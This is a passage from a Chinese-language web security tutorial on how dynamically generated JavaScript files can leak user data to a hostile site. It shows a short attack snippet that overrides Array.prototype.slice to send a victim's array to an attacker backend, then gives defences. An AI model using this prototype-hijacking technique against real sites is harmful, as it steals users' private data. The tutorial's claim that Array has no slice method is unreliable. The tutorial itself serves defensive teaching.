从代码中可以看到,在arr数组中存在了3个与用户有关的隐私数据。然后arr实例调用了slice()方法。很明显这个方法是不存在的。因为arr实例本身没有创建和声明这个方法,同时在Array对象中也没有这个方法。但是当出现一个这样的情况的时候,程序并没有报错,只是说明这个slice方法不存在而已。所以在这样的情况下,可能程序员也并不知道他所创建的arr实例有调用slice()这样的一个方法。那么上面的这段代码就很有可能会被攻击者所利用。
以下是恶意站点的代码:
<script type="text/javascript"> Array.prototype.slice = function() { //send data to attacker sendToAttackBackend(this); } </script> <script type="text/javascript" src="https://www.good.com/leak.js"></script>
当用户访问到这个含有恶意代码的网站的时候,导入的leak.js中的JavaScript要执行slice方法执行的时候,就会调用攻击者为Array添加的slice方法,这样敏感数据就会发送到攻击者了。
防范
开发人员在进行网站开发的时候,最好是将代码与数据分开。敏感和重要的数据应该保存在单独的文件中,这样这些文件就不会被浏览器当作JavaScript来执行了。同时还需要为这些静态资源设置访问权限,只要在用户登录之后才可以访问,在这种情况下攻击者即使引入了这个静态资源也无法访问这个数据。
总结
以上就是关于动态JavaScript所造成危害的全部内容了,希望这篇文章能对大家的学习或者工作带来一定的帮助,如果有疑问大家可以留言交流。
您可能感兴趣的文章: